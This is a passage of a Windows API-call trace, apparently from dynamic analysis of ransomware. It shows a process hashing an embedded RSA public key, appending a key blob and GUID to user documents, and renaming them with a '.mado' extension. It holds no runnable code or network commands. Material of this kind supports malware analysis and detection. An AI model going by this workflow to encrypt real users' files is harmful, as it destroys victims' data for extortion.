[0206.358] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.359] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.359] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.359] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.359] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.359] GetLastError () returned 0x0 [0206.359] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.359] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.360] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.360] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.360] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.360] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.361] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x12906, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.361] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6efa0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6efa0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0206.361] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0206.361] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0206.361] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0206.361] CloseHandle (hObject=0x63c) returned 1 [0206.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67078 [0206.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8f0) returned 0x3b7b950 [0206.362] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0206.362] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\IKLST5refT-CgW.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\iklst5reft-cgw.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\IKLST5refT-CgW.odp.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\iklst5reft-cgw.odp.mado")) returned 1 [0206.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.363] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0206.364] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2491170, ftCreationTime.dwHighDateTime=0x1d5ded0, ftLastAccessTime.dwLowDateTime=0x991d0b90, ftLastAccessTime.dwHighDateTime=0x1d5e27b, ftLastWriteTime.dwLowDateTime=0x991d0b90, ftLastWriteTime.dwHighDateTime=0x1d5e27b, nFileSizeHigh=0x0, nFileSizeLow=0x10691, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="V7cX B.ots", cAlternateFileName="V7CXB~1.OTS")) returned 1 [0206.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0206.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11e) returned 0x336fe98 [0206.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0206.364] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\V7cX B.ots") returned=".ots" [0206.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\vXUpqISFwbSAR3N1vI\\V7cX B.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\vxupqisfwbsar3n1vi\\v7cx b.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0206.365] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=67217) returned 1 [0206.365] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0206.367] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x1066b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.367] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0206.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.368] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.368] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0206.368] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x10691, lpOverlapped=0x0) returned 1 [0206.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.369] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0206.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.369] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0206.369] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0206.370] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0206.370] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0206.370] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0206.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0206.370] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0206.370] GetLastError () returned 0x0 [0206.370] CryptDestroyHash (hHash=0x32ef238) returned 1 [0206.370] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0206.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0206.370] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0206.370] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0206.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.370] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0206.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10690) returned 0x3b87c98 [0206.371] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0206.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b86e60 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b60 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b86ea8 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b78 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ba8 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bf0 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bc0 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0206.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0206.372] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ba8 | out: hHeap=0x2c0000) returned 1 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bc0 | out: hHeap=0x2c0000) returned 1 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bf0 | out: hHeap=0x2c0000) returned 1 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bf0 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3b79bc0 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3b79ba8 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b67078 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b67190 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0206.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bc0 | out: hHeap=0x2c0000) returned 1 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ba8 | out: hHeap=0x2c0000) returned 1 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0206.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bf0 | out: hHeap=0x2c0000) returned 1 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0206.373] GetCurrentThreadId () returned 0x600 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b7aa88 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x32c64e8 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.373] GetCurrentThreadId () returned 0x600 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0206.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.373] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6f0a8 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bf0 [0206.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ba8 [0206.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0206.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bc0 [0206.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0206.374] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0206.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79b90 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c08 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79bd8 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79c20 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ba8 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3b79ba8 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c6a8 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bf0 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b67078 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c20 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x336f8f0 [0206.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0206.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b672a8 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0206.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b673c0 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79ba8 | out: hHeap=0x2c0000) returned 1 [0206.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b7b950 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67078 | out: hHeap=0x2c0000) returned 1 [0206.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b673c0 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f8f0 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b672a8 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79bd8 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b79c08 | out: hHeap=0x2c0000) returned 1 [0206.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) 